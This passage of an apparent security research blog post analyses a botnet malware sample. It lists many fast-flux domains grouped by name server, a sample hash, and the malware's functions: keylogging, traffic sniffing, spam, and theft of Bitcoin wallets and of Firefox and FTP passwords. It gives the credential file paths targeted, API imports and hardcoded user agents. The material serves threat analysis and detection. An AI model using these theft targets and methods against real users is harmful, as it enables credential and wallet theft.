tivuzga.eu<br />
tunmayz.eu<br />
tuopbel.eu<br />
udquget.eu<br />
udsopof.eu<br />
ugjypnu.eu<br />
uhdijgi.eu<br />
ujgitip.eu<br />
ukxames.eu<br />
unvevvi.eu<br />
upyqpiz.eu<br />
ussypoc.eu<br />
uswohyl.eu<br />
uxjatqo.eu<br />
vadjani.eu<br />
venuqdy.eu<br />
vepucyk.eu<br />
vizocny.eu<br />
wabomiw.eu<br />
wyylsic.eu<br />
xagublo.eu<br />
xeyhzyc.eu<br />
xijawpa.eu<br />
xumitza.eu<br />
ybocqug.eu<br />
ycpasjy.eu<br />
yhivdob.eu<br />
yhvotyf.eu<br />
yjygtux.eu<br />
ypvipja.eu<br />
ypychuj.eu<br />
yrhodyf.eu<br />
ysfukiw.eu<br />
yvadmap.eu<br />
yvsuxel.eu<br />
zakasoc.eu<br />
zawfyev.eu<br />
zequspu.eu<br />
zexdaga.eu<br />
ziqnypa.eu<br />
zobubof.eu<br />
zogaguj.eu<br />
zoneczu.eu<br />
zuzzuna.eu<br />
zydnimy.eu<br />
zyefhim.eu<br />
zymidaf.eu<br />
zyvacus.eu<br />
frostli.com<br />
<br />
<br />
ns[1-6].pizzebu.com<br />
awmybak.eu<br />
beqylhe.eu<br />
bozopit.eu<br />
dilecdo.eu<br />
edkadaf.eu<br />
ejywqem.eu<br />
essessa.eu<br />
etrodhy.eu<br />
gipahco.eu<br />
gycakus.eu<br />
hiahnuh.eu<br />
iqqeniv.eu<br />
jerufuw.eu<br />
juzagyt.eu<br />
kareffu.eu<br />
kufogku.eu<br />
monedyg.eu<br />
opgukem.eu<br />
oxkyrir.eu<br />
piqxoxo.eu<br />
qofabar.eu<br />
rivinax.eu<br />
rybunwa.eu<br />
seybdec.eu<br />
suiqtat.eu<br />
udqejyx.eu<br />
ugdycom.eu<br />
usmuzeq.eu<br />
wabomiw.eu<br />
wyylsic.eu<br />
xulotgu.eu<br />
ykqewyx.eu<br />
yraxvuh.eu<br />
zaetpop.eu<br />
zitufon.eu<br />
zobubof.eu<br />
zoneczu.eu<br />
agomdaz.eu<br />
ahmomyx.eu<br />
ahvorme.eu<br />
akdygij.eu<br />
axcinov.eu<br />
bemewan.eu<br />
buzgomu.eu<br />
cikynon.eu<br />
cirafir.eu<br />
ciskuur.eu<br />
cureses.eu<br />
ezadkam.eu<br />
fagahmo.eu<br />
gatocut.eu<br />
gawgulo.eu<br />
gixseka.eu<br />
goemqag.eu<br />
gyhello.eu<br />
hatahse.eu<br />
havimpa.eu<br />
hometxa.eu<br />
idbizex.eu<br />
ileqbew.eu<br />
imarnim.eu<br />
japonzo.eu<br />
jobfyre.eu<br />
kuarzoz.eu<br />
kuletif.eu<br />
kytyvod.eu<br />
lelreyb.eu<br />
lomqybi.eu<br />
lubigne.eu<br />
macetty.eu<br />
mosidgu.eu<br />
movjihi.eu<br />
mufidis.eu<br />
nagegal.eu<br />
nexreza.eu<br />
noalbej.eu<br />
nuvyhne.eu<br />
nuzozuf.eu<br />
ofxawmi.eu<br />
opybxyb.eu<br />
owlyzgi.eu<br />
pefzota.eu<br />
pexigki.eu<br />
qoanxat.eu<br />
qonerne.eu<br />
roqeluv.eu<br />
rylliny.eu<br />
taksusy.eu<br />
tugatiq.eu<br />
udzonek.eu<br />
uffecuj.eu<br />
ugsowqy.eu<br />
uhxesap.eu<br />
ukryxyw.eu<br />
wigiluk.eu<br />
xumitza.eu<br />
xuygcut.eu<br />
xyrpavu.eu<br />
ydbeqes.eu<br />
yfuqcon.eu<br />
yfynqav.eu<br />
yjygtux.eu<br />
yklocgu.eu<br />
ynpysul.eu<br />
yrhodyf.eu<br />
ysfukiw.eu<br />
zanpohe.eu<br />
zyvacus.eu<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
awmybak.eu<br />
beqylhe.eu<br />
bozopit.eu<br />
dilecdo.eu<br />
edkadaf.eu<br />
ejywqem.eu<br />
essessa.eu<br />
etrodhy.eu<br />
gipahco.eu<br />
gycakus.eu<br />
hiahnuh.eu<br />
iqqeniv.eu<br />
jerufuw.eu<br />
juzagyt.eu<br />
kareffu.eu<br />
kufogku.eu<br />
monedyg.eu<br />
opgukem.eu<br />
oxkyrir.eu<br />
piqxoxo.eu<br />
qofabar.eu<br />
rivinax.eu<br />
rybunwa.eu<br />
seybdec.eu<br />
suiqtat.eu<br />
udqejyx.eu<br />
ugdycom.eu<br />
usmuzeq.eu<br />
wabomiw.eu<br />
wyylsic.eu<br />
xulotgu.eu<br />
ykqewyx.eu<br />
yraxvuh.eu<br />
zaetpop.eu<br />
zitufon.eu<br />
zobubof.eu<br />
zoneczu.eu<br />
<br />
pizzebu.com.<br />
agomdaz.eu<br />
ahmomyx.eu<br />
ahvorme.eu<br />
akdygij.eu<br />
axcinov.eu<br />
bemewan.eu<br />
buzgomu.eu<br />
cikynon.eu<br />
cirafir.eu<br />
ciskuur.eu<br />
cureses.eu<br />
ezadkam.eu<br />
fagahmo.eu<br />
gatocut.eu<br />
gawgulo.eu<br />
gixseka.eu<br />
goemqag.eu<br />
gyhello.eu<br />
hatahse.eu<br />
havimpa.eu<br />
hometxa.eu<br />
idbizex.eu<br />
ileqbew.eu<br />
imarnim.eu<br />
japonzo.eu<br />
jobfyre.eu<br />
kuarzoz.eu<br />
kuletif.eu<br />
kytyvod.eu<br />
lelreyb.eu<br />
lomqybi.eu<br />
lubigne.eu<br />
macetty.eu<br />
mosidgu.eu<br />
movjihi.eu<br />
mufidis.eu<br />
nagegal.eu<br />
nexreza.eu<br />
noalbej.eu<br />
nuvyhne.eu<br />
nuzozuf.eu<br />
ofxawmi.eu<br />
opybxyb.eu<br />
owlyzgi.eu<br />
pefzota.eu<br />
pexigki.eu<br />
qoanxat.eu<br />
qonerne.eu<br />
roqeluv.eu<br />
rylliny.eu<br />
taksusy.eu<br />
tugatiq.eu<br />
udzonek.eu<br />
uffecuj.eu<br />
ugsowqy.eu<br />
uhxesap.eu<br />
ukryxyw.eu<br />
wigiluk.eu<br />
xumitza.eu<br />
xuygcut.eu<br />
xyrpavu.eu<br />
ydbeqes.eu<br />
yfuqcon.eu<br />
yfynqav.eu<br />
yjygtux.eu<br />
yklocgu.eu<br />
ynpysul.eu<br />
yrhodyf.eu<br />
ysfukiw.eu<br />
zanpohe.eu<br />
zyvacus.eu<br />
<br />
<br />
ns[1-6]diastr.com<br />
affuxok.ru<br />
aglycyx.ru<br />
agogsip.ru<br />
ahodxil.ru<br />
ajgufog.ru<br />
aqcanov.ru<br />
avondov.ru<br />
axrohug.ru<br />
baryqyq.ru<br />
bixqijy.ru<br />
bogquse.ru<br />
borutat.ru<br />
butawad.ru<br />
bylviha.ru<br />
cajuhwo.ru<br />
cesisnu.ru<br />
cibudit.ru<br />
coukdyg.ru<br />
cuhugoh.ru<br />
cyuhtut.ru<br />
daagtah.ru<br />
deivwyx.ru<br />
duebgud.ru<br />
efdylve.ru<br />
ehgycuj.ru<br />
eqlasho.ru<br />
exmotof.ru<br />
ezirhaz.ru<br />
fenataj.ru<br />
fyvegom.ru<br />
giczeca.ru<br />
heupjeq.ru<br />
hidafog.ru<br />
hivagdy.ru<br />
houktuh.ru<br />
hugejin.ru<br />
hyjamat.ru<br />
iddyraq.ru<br />
ihfajoc.ru<br />
ixqasib.ru<br />
jyernol.ru<br />
kabezer.ru<br />
kipokfy.ru<br />
koqqeih.ru<br />
kufdeag.ru<br />
kulegoh.ru<br />
kyqolby.ru<br />
lauqpum.ru<br />
lojseuv.ru<br />
lojyzyt.ru<br />
loxusyd.ru<br />
magucjo.ru<br />
melimma.ru<br />
miobrav.ru<br />
mubidpy.ru<br />
nebirza.ru<br />
nilwoim.ru<br />
nimepof.ru<br />
nougxin.ru<br />
ojuxxub.ru<br />
okrolyk.ru<br />
onsenyq.ru<br />
pesudwa.ru<br />
pidohis.ru<br />
pokatik.ru<br />
pubujux.ru<br />
qiohxuv.ru<br />
qoqwoas.ru<br />
qoripwe.ru<br />
quhokle.ru<br />
raleqle.ru<br />
ripexru.ru<br />
rodejuj.ru<br />
rymyheh.ru<br />
sidinox.ru<br />
suvmune.ru<br />
teuxtik.ru<br />
tevythi.ru<br />
titepob.ru<br />
tobjuow.ru<br />
togpuit.ru<br />
tonalog.ru<br />
tozukem.ru<br />
tyhrypo.ru<br />
ubbylys.ru<br />
veoxzul.ru<br />
vysatyv.ru<br />
wegipij.ru<br />
wexriyp.ru<br />
wiewkux.ru<br />
wyliwow.ru<br />
xakruaq.ru<br />
xekisuw.ru<br />
xequjej.ru<br />
xuzuppu.ru<br />
xybired.ru<br />
ygdykin.ru<br />
ykrijyj.ru<br />
ypemval.ru<br />
ypyxwon.ru<br />
yqdazyb.ru<br />
yvnahty.ru<br />
zaacvas.ru<br />
zeryqiq.ru<br />
zihemmi.ru<br />
zuzilum.ru<br />
<br />
ns[1-6]snapoli.com<br />
affuxok.ru<br />
ajgufog.ru<br />
bogquse.ru<br />
deivwyx.ru<br />
duebgud.ru<br />
exmotof.ru<br />
ezirhaz.ru<br />
giczeca.ru<br />
houktuh.ru<br />
ihfajoc.ru<br />
jazzute.ru<br />
kabezer.ru<br />
kipokfy.ru<br />
nilwoim.ru<br />
ojuxxub.ru<br />
okrolyk.ru<br />
onsenyq.ru<br />
qiohxuv.ru<br />
qoqwoas.ru<br />
raleqle.ru<br />
ripexru.ru<br />
salyqiz.ru<br />
sidinox.ru<br />
suvmune.ru<br />
tobjuow.ru<br />
tyhrypo.ru<br />
veoxzul.ru<br />
vysatyv.ru<br />
wegipij.ru<br />
xuzuppu.ru<br />
ypemval.ru<br />
yqdazyb.ru<br />
yvnahty.ru<br />
zuhycyc.ru<br />
snapoli.com<br />
<br />
<br />
ns[1-6].firstara.com<br />
alnykwu.in<br />
anhozur.in<br />
avutguz.in<br />
azgesaj.in<br />
bagexev.in<br />
bemdymu.in<br />
beruhor.in<br />
bydxufu.in<br />
cutrouc.in<br />
docxymo.in<br />
dyemheb.in<br />
dysjeag.in<br />
edsahug.in<br />
egziwof.in<br />
ejredeg.in<br />
eptulyk.in<br />
esqific.in<br />
ewnupaj.in<br />
fybildo.in<br />
geigbeq.in<br />
goivgek.in<br />
gorocez.in<br />
havowyx.in<br />
haywsab.in<br />
hexdoik.in<br />
hezypez.in<br />
hirurgy.in<br />
honedju.in<br />
hotfool.in<br />
huisfeq.in<br />
huvygmy.in<br />
icotkik.in<br />
iczipyk.in<br />
iddeste.in<br />
igtevax.in<br />
iksutel.in<br />
infobyt.in<br />
itkyguh.in<br />
ivhapuf.in<br />
jepokfa.in<br />
jiifxoz.in<br />
jiquvel.in<br />
juzuxcy.in<br />
kaduqec.in<br />
kiabrok.in<br />
kufirqe.in<br />
kyrocok.in<br />
legycxa.in<br />
leqozdy.in<br />
lexucyl.in<br />
moropdy.in<br />
mutywro.in<br />
myzxozy.in<br />
negmeuw.in<br />
nytutiv.in<br />
ofusqar.in<br />
oqufnyg.in<br />
oxetpah.in<br />
pamywuz.in<br />
pedezby.in<br />
pisyhyn.in<br />
pydilaw.in<br />
qabojir.in<br />
qifufuk.in<br />
raehxez.in<br />
riwgagi.in<br />
rufabex.in<br />
seazdel.in<br />
seompis.in<br />
sinuheh.in<br />
talutyw.in<br />
tarraso.in<br />
tivenyr.in<br />
ucfensa.in<br />
ufbofky.in<br />
ufhewuk.in<br />
ujjukag.in<br />
uqtopik.in<br />
urxiwat.in<br />
uwhepij.in<br />
veqyhli.in<br />
vezkoty.in<br />
vugozan.in<br />
vuqfuek.in<br />
wasidxo.in<br />
wynzobo.in<br />
wyvloiq.in<br />
xategon.in<br />
xevezby.in<br />
xutepyj.in<br />
xuwigir.in<br />
yxfibet.in<br />
yzrefyf.in<br />
zaxseyz.in<br />
zilziom.in<br />
zohdoud.in<br />
zunipaw.in<br />
zynacha.in<br />
firstara.com<br />
<br />
<br />
roblect.com<br />
akzruyh.ce.ms<br />
apeefoacx.ce.ms<br />
ezoglolbj.ce.ms<br />
gcbjbamdj.ce.ms<br />
geljoxlkd.ce.ms<br />
himukcnen.ce.ms<br />
hyyviccku.ce.ms<br />
imoqjzsej.ce.ms<br />
ljltpaffv.ce.ms<br />
lrjvgjwmg.ce.ms<br />
lvfksyqmz.ce.ms<br />
mhfrhelfr.ce.ms<br />
mkiplkooq.ce.ms<br />
nlozaydyk.ce.ms<br />
ouxwexphh.ce.ms<br />
rxhndcxxi.ce.ms<br />
shuxkzjvp.ce.ms<br />
dlmdlemqjw.ce.ms<br />
roblect.com<br />
<br />
<br />
galloma.com<br />
ajyxxun.ce.ms<br />
avtjicn.ce.ms<br />
bbzulty.ce.ms<br />
bhueizz.ce.ms<br />
bmxnbbz.ce.ms<br />
bzzqkjk.ce.ms<br />
cluuocw.ce.ms<br />
cqkjibj.ce.ms<br />
dixrkno.ce.ms<br />
dkwhwqc.ce.ms<br />
eymosvc.ce.ms<br />
ezwrvsq.ce.ms<br />
fautuzh.ce.ms<br />
fbxmkgs.ce.ms<br />
gnrmdds.ce.ms<br />
hvhlazq.ce.ms<br />
iygxhfq.ce.ms<br />
jddpvzw.ce.ms<br />
jejmqny.ce.ms<br />
jlruxuf.ce.ms<br />
jqqvqnv.ce.ms<br />
jvhqpyj.ce.ms<br />
ldntbtg.ce.ms<br />
lkddqig.ce.ms<br />
miulvnp.ce.ms<br />
neitfvf.ce.ms<br />
norwdyd.ce.ms<br />
obsnkwx.ce.ms<br />
oqylgfb.ce.ms<br />
pyxthzm.ce.ms<br />
qbdptev.ce.ms<br />
rkzdnlm.ce.ms<br />
rrfrahh.ce.ms<br />
saogsek.ce.ms<br />
sqwdoei.ce.ms<br />
tazaopm.ce.ms<br />
tyldrgy.ce.ms<br />
ujbtapn.ce.ms<br />
uvqyfnd.ce.ms<br />
vwtnddd.ce.ms<br />
wfbanyv.ce.ms<br />
wukiuxb.ce.ms<br />
wxatkfz.ce.ms<br />
xalagnq.ce.ms<br />
yvfeyyn.ce.ms<br />
zhmeqqs.ce.ms<br />
aadsfqle.ce.ms<br />
aahoqmie.ce.ms<br />
adokxrbx.ce.ms<br />
adpiisyi.ce.ms<br />
azyvxiqw.ce.ms<br />
bwwrudue.ce.ms<br />
ccybfonk.ce.ms<br />
dlylxoca.ce.ms<br />
dplvoghe.ce.ms<br />
egezeqki.ce.ms<br />
fjjlnqdt.ce.ms<br />
flgsajeb.ce.ms<br />
fonpxxvd.ce.ms<br />
gwlgkror.ce.ms<br />
gwtowtjz.ce.ms<br />
hezfpxvr.ce.ms<br />
iesathjc.ce.ms<br />
iigijrqo.ce.ms<br />
ijcyicbj.ce.ms<br />
iupyrwes.ce.ms<br />
kzomxpkx.ce.ms<br />
ltaqntzd.ce.ms<br />
ltjohroy.ce.ms<br />
mhivnltw.ce.ms<br />
nanxawdp.ce.ms<br />
nhdoyayw.ce.ms<br />
nktxmecg.ce.ms<br />
nucmqeml.ce.ms<br />
ogmoupcf.ce.ms<br />
pdmhojaf.ce.ms<br />
phlmdkkg.ce.ms<br />
ptufrgou.ce.ms<br />
pwhwhatr.ce.ms<br />
qgewkpxr.ce.ms<br />
raqdiqwr.ce.ms<br />
reoawbqz.ce.ms<br />
sigafisv.ce.ms<br />
spdyccmi.ce.ms<br />
srqdtssc.ce.ms<br />
tfxjtthw.ce.ms<br />
tlzfdnjv.ce.ms<br />
twszglot.ce.ms<br />
ulpgjmhh.ce.ms<br />
vcrlyfcm.ce.ms<br />
viamftgu.ce.ms<br />
vinlgixi.ce.ms<br />
vlyhbwqp.ce.ms<br />
vvmqwzjd.ce.ms<br />
wanolzyh.ce.ms<br />
wcvlwcqz.ce.ms<br />
wocsgoku.ce.ms<br />
wrtetrxh.ce.ms<br />
xacnagya.ce.ms<br />
xbpfgoob.ce.ms<br />
xyzrriwp.ce.ms<br />
yclrslbn.ce.ms<br />
yfonzetf.ce.ms<br />
zdzmkdll.ce.ms<br />
znfxgwwr.ce.ms<br />
aanhryihh.ce.ms<br />
amwthlqru.ce.ms<br />
axikehkes.ce.ms<br />
axrgpgnay.ce.ms<br />
bqtvpxibn.ce.ms<br />
bsaqfqzof.ce.ms<br />
bugtjtgwx.ce.ms<br />
cmuvcunas.ce.ms<br />
cqszgtvxd.ce.ms<br />
cwpdeuvmo.ce.ms<br />
desajkhtt.ce.ms<br />
dgxdydvqu.ce.ms<br />
dhmykycap.ce.ms<br />
djgkxulbq.ce.ms<br />
dldbiwlib.ce.ms<br />
dmmwbnmba.ce.ms<br />
ebeecytff.ce.ms<br />
eehxpgnfa.ce.ms<br />
elvliioxz.ce.ms<br />
ewqvmeirc.ce.ms<br />
festcfwmb.ce.ms<br />
fnmqkvqhc.ce.ms<br />
fnwqxoaqd.ce.ms<br />
gjfqabqzs.ce.ms<br />
gkqssznth.ce.ms<br />
glfvlbsqy.ce.ms<br />
godlblffu.ce.ms<br />
gxvkuefqy.ce.ms<br />
gzwynxrdz.ce.ms<br />
hagduqcbi.ce.ms<br />
hbddtiimz.ce.ms<br />
hjutzoytz.ce.ms<br />
hpuurfkft.ce.ms<br />
hrrdabsgc.ce.ms<br />
hvcsfnnbl.ce.ms<br />
hxnvbogua.ce.ms<br />
ibhmbiujp.ce.ms<br />
ibnrnrsca.ce.ms<br />
ihtxwgrri.ce.ms<br />
ikbpsegqa.ce.ms<br />
imozsewyo.ce.ms<br />
inyqjraby.ce.ms<br />
iqwkvaleh.ce.ms<br />
iqxflmwpo.ce.ms<br />
ivejampkn.ce.ms<br />
jhzzwrnnv.ce.ms<br />
jkmxhwjzd.ce.ms<br />
jmjnguloo.ce.ms<br />
jovrpwfks.ce.ms<br />
jrctenbni.ce.ms<br />
khnzohexi.ce.ms<br />
klkzahmar.ce.ms<br />
kogqvmbyl.ce.ms<br />
ldgtxgznq.ce.ms<br />
ldzjcvqai.ce.ms<br />
liowklchs.ce.ms<br />
lqvncgwsu.ce.ms<br />
mffhjjuyo.ce.ms<br />
mhiyegpwm.ce.ms<br />
mpnfrtxkb.ce.ms<br />
mxzhmcyus.ce.ms<br />
nbgatlklr.ce.ms<br />
ncqpfwapp.ce.ms<br />
nrsxuxxjk.ce.ms<br />
nzaqohego.ce.ms<br />
ofzdzqhgs.ce.ms<br />
oknstngdx.ce.ms<br />
ooiebkatd.ce.ms<br />
oowkipkpf.ce.ms<br />
ortshbpzv.ce.ms<br />
oueaegkkt.ce.ms<br />
owhhnjtvt.ce.ms<br />
pbxyhsjcl.ce.ms<br />
phttlfxnv.ce.ms<br />
pnsohrgpm.ce.ms<br />
pqqhqklih.ce.ms<br />
qngclqeln.ce.ms<br />
qxztybniy.ce.ms<br />
rdmhzrzab.ce.ms<br />
rllwnboym.ce.ms<br />
rvbkzpsls.ce.ms<br />
rypwddplv.ce.ms<br />
rytfgngkw.ce.ms<br />
sbealjyie.ce.ms<br />
sbryweuao.ce.ms<br />
sdgokmpmp.ce.ms<br />
sfkgvnqll.ce.ms<br />
shhgcqijh.ce.ms<br />
shkrbmwiq.ce.ms<br />
sikoastac.ce.ms<br />
soabvshxw.ce.ms<br />
srcfkmvtz.ce.ms<br />
sstmzbmvc.ce.ms<br />
szdigkjog.ce.ms<br />
thchbcfsr.ce.ms<br />
thxvwlnst.ce.ms<br />
udprbpncg.ce.ms<br />
uiniyiwze.ce.ms<br />
upsbjrgpy.ce.ms<br />
upthfdgon.ce.ms<br />
uuybeevvw.ce.ms<br />
vexojepsn.ce.ms<br />
vojehftlt.ce.ms<br />
vwhbcowxu.ce.ms<br />
vwvabbujm.ce.ms<br />
wodutsrzu.ce.ms<br />
wyfhzlmkw.ce.ms<br />
wzyxueqhy.ce.ms<br />
xbaxsnihc.ce.ms<br />
ygmehzjlg.ce.ms<br />
yorzhrizg.ce.ms<br />
ypflxjlzo.ce.ms<br />
zlkaimpeq.ce.ms<br />
ztngnmmib.ce.ms<br />
zxtvqkftz.ce.ms<br />
aknmlvkeho.ce.ms<br />
apiuxcoauy.ce.ms<br />
buygunnsnw.ce.ms<br />
cblfdefxmf.ce.ms<br />
cmbwsssnlo.ce.ms<br />
cwoomqxtjo.ce.ms<br />
dohnebpdrp.ce.ms<br />
dyioatrhnx.ce.ms<br />
eqqtdwbnwg.ce.ms<br />
eyeamccxvb.ce.ms<br />
hlmewfctuc.ce.ms<br />
iqqspkqdji.ce.ms<br />
jjyzwvufmb.ce.ms<br />
jsgecgfnrw.ce.ms<br />
kvmchjinmu.ce.ms<br />
lglqkkqybq.ce.ms<br />
lqsyddcoot.ce.ms<br />
lvscrnzqzm.ce.ms<br />
mgxstzpxfv.ce.ms<br />
nflmyecafv.ce.ms<br />
nmwhryeybz.ce.ms<br />
noilnvnsie.ce.ms<br />
nuyzxhxyqn.ce.ms<br />
oixtvfudyd.ce.ms<br />
pnfyoidgkn.ce.ms<br />
pnsntpjnhw.ce.ms<br />
pvfnpwoyjq.ce.ms<br />
pxafmmglnp.ce.ms<br />
qdmxpqpkbk.ce.ms<br />
razocjpywj.ce.ms<br />
rcmtvlzbuk.ce.ms<br />
rljgnvkghq.ce.ms<br />
rlybfffajb.ce.ms<br />
rybrueryce.ce.ms<br />
sokhxokonz.ce.ms<br />
spuiygpbcr.ce.ms<br />
sweaxoedyw.ce.ms<br />
sygsgahycs.ce.ms<br />
tepbzktaqg.ce.ms<br />
uupkufucmx.ce.ms<br />
vcoewypubi.ce.ms<br />
xerrwvuuzb.ce.ms<br />
xhmqllyufj.ce.ms<br />
xmfydbnjgq.ce.ms<br />
ydokioxqpc.ce.ms<br />
yefwipbiih.ce.ms<br />
ysjeguxpmt.ce.ms<br />
<br /></div>
<br />
These are lists of IPs that <b>ns1.boomsco.com</b> (created 2013-01-13) and <b>ns1.larstor.com </b>(created 2012-12-22) were pointing to since their creation. The lists show how fast the ips change - more than 9,000 times over 30-45 days. There are many infected hosts but it does not mean that every host in the list was infected. Some IPs only were used for a second, which also demonstrates the evasive nature of the fast flux.<br />
<a href="http://files.deependresearch.org/logs/boomsco_asn.txt">http://files.deependresearch.org/logs/boomsco_asn.txt</a><br />
<a href="http://files.deependresearch.org/logs/larstor_asn.txt">http://files.deependresearch.org/logs/larstor_asn.txt</a><br />
<br />
<br />
<b style="color: #e69138; font-family: inherit;">Malware functionality and system changes.</b><br />
Based on 0C921935F0880B5C2161B3905F8A3069 - active fresh sample, first seen by Virus 2013-02-06, PE date stamp 2011-30-10.<br />
<b><br /></b></div>
<span style="line-height: 18.99147605895996px;"></span><br />
<div>
<span style="line-height: 18.99147605895996px;">We also analyzed fresh samples with 2013 PE date stamps and observed same / similar functionality (some lack some features like Firefox or FTP password stealing or while others have the full set). Compared to Dec. 2012 <a href="http://www.abuse.ch/?p=4878">post by abuse.ch</a>, the overall functionality did not change much. </span></div>
<span style="line-height: 18.99147605895996px;">
</span>
<br />
<div>
<span style="line-height: 18.99147605895996px;"><br /></span></div>
<span style="line-height: 18.99147605895996px;">
</span>
<br />
<div>
<span style="line-height: 18.99147605895996px;">Functionality:</span></div>
<span style="line-height: 18.99147605895996px;">
</span>
<br />
<ul>
<li><span style="font-family: inherit; line-height: 18.99147605895996px;">Installs winpcap and monitors traffic</span></li>
<li>Keylogging capabilities </li>
</ul>
<blockquote class="tr_bq">
<ul><i>see SetWindowsHookExW - in KERNEL32.dll imports </i></ul>
</blockquote>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul style="text-align: left;">
<li><span style="font-family: inherit; line-height: 18.99147605895996px;">Steals Bitcoin wallet data (read more here<a href="https://en.bitcoin.it/wiki/Securing_your_wallet"> https://en.bitcoin.it/wiki/Securing_your_wallet</a>)</span></li>
</ul>
<blockquote class="tr_bq">
<i>C:\Documents and Settings\\Application Data\Bitcoin\wallet.dat</i></blockquote>
<ul style="text-align: left;">
<li><span style="font-family: inherit; line-height: 18.99147605895996px;">Parses Firefox's Password Manager Local Database in order to steal stored passwords: Firefox stores password data in two files: key3.db (Master Password / Encryption key) and a 'signons' file (encrypted names and passwords). Reads:</span></li>
</ul>
<blockquote class="tr_bq">
<blockquote class="tr_bq">
<i>--%USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\signons.sqlite</i></blockquote>
<blockquote class="tr_bq">
<i>--%USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\signons.sqlite</i></blockquote>
<blockquote class="tr_bq">
<i>--%USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\key3.db</i></blockquote>
<blockquote class="tr_bq">
<i>--%USERPROFILE%\[username]\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\key3.db</i></blockquote>
</blockquote>
<blockquote class="tr_bq" style="text-align: left;">
<span style="line-height: 18.99147605895996px;">See SQL related imports in </span>ODBCJT32.dll</blockquote>
<blockquote class="tr_bq">
<i>SQLGetCursorNameW<br />SQLFreeStmt<br />SQLGetConnectAttrW<br />ConfigDialogProc<br />SQLSetCursorNameW<br />SQLSetStmtAttrW<br />SQLFreeConnect<br />SQLCloseCursor<br />DefTxtFmtDlgProc<br />SQLSetConnectAttrW<br />SQLColumnsW<br />SQLDisconnect<br />SQLDriverConnectW<br />SQLTablesW<br />SQLGetDiagFieldW<br />SQLBulkOperations<br />SQLSetPos<br />SQLFreeHandle<br />SQLSetDescFieldW<br />SQLNumResultCols<br />SQLConnectW<br />SQLExecute<br />SQLProcedureColumnsW<br />SQLFetch</i><i> </i></blockquote>
<ul>
<li><span style="font-family: inherit; line-height: 18.99147605895996px;">Sends spam</span></li>
</ul>
<blockquote class="tr_bq" style="text-align: left;">
<span style="line-height: 18.99147605895996px;">iMimeMessageTree api calls: </span>iMimeMessageTree parses and creates Internet messages. IMimeMessageTree treats a message as a tree of bodies where each body has a header and associated content. It gives a client the most flexible, low-level access to a message. Read more MimeMessageTree Interface <a href="http://msdn.microsoft.com/en-us/library/ms711715(v=vs.85).aspx">http://msdn.microsoft.com/en-us/library/ms711715(v=vs.85).aspx</a></blockquote>
<blockquote class="tr_bq">
imports from INETCOMM.dll</blockquote>
<blockquote>
<i>MimeOleSMimeCapAddCert<br />MimeEditIsSafeToRun<br />MimeOleUnEscapeStringInPlace<br />EssSignCertificateDecodeEx<br />etc.</i></blockquote>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul style="text-align: left;">
<li><span style="line-height: 18.99147605895996px;">As described</span><span style="font-family: inherit;"><span style="line-height: 18.99147605895996px;"> previously, steals saved passwords from these FTP applications</span></span></li>
<li><span style="font-family: inherit;"><span style="line-height: 18.99147605895996px;">(<a href="http://www.lavasoft.com/mylavasoft/malware-descriptions/blog/backdoorwin32kelihos-trojanwin32genericbt">http://www.lavasoft.com/mylavasoft/malware-descriptions/blog/backdoorwin32kelihos-trojanwin32genericbt</a>). You can easily see these in memory ram dumps. </span></span></li>
</ul>
<br />
<span style="font-family: inherit; line-height: 18.99147605895996px;">User Agents used (hardcoded in binaries), you can see in memory dumps or after unpacking</span><br />
<blockquote class="tr_bq" style="text-align: left;">
<ol style="text-align: left;">
<li>Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2a1pre) Gecko/20090403 Firefox/3.6a1pre</li>
<li>Mozilla/5.0 (X11; U; Linux x86_64; cy; rv:1.9.1b3) Gecko/20090327 Fedora/3.1-0.11.beta3.fc11 Firefox/3.1b3</li>
<li>Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11</li>
<li>Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6 ; nl; rv:1.9) Gecko/2008051206 Firefox/3.0</li>
<li>Mozilla/5.0 (Windows; U; Windows NT 6.1; es-AR; rv:1.9) Gecko/2008051206 Firefox/3.0</li>
<li>Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15</li>
<li>Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-HK; rv:1.8.1.7) Gecko Firefox/2.0</li>
<li>Mozilla/5.0 (Windows; U; Win95; it; rv:1.8.1) Gecko/20061010 Firefox/2.0</li>
<li>Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7</li>
<li>Mozilla/5.0 (ZX-81; U; CP/M86; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1</li>
<li>Mozilla/5.0 (X11; U; NetBSD alpha; en-US; rv:1.8) Gecko/20060107 Firefox/1.5</li>
<li>Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1</li>
<li>Mozilla/5.0 (X11; I; SunOS sun4u; en-GB; rv:1.7.8) Gecko/20050713 Firefox/1.0.4</li>
<li>Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.5) Gecko/20041222 Firefox/1.0 (Debian package 1.0-4)</li>
<li>Mozilla/5.0 (Windows; U; Win 9x 4.90; rv:1.7) Gecko/20041103 Firefox/0.9.3</li>
<li>Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9</li>
<li>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)</li>
<li>Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 1.1.4322; Tablet PC 2.0; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; MS-RTC LM 8; InfoPath.3)</li>
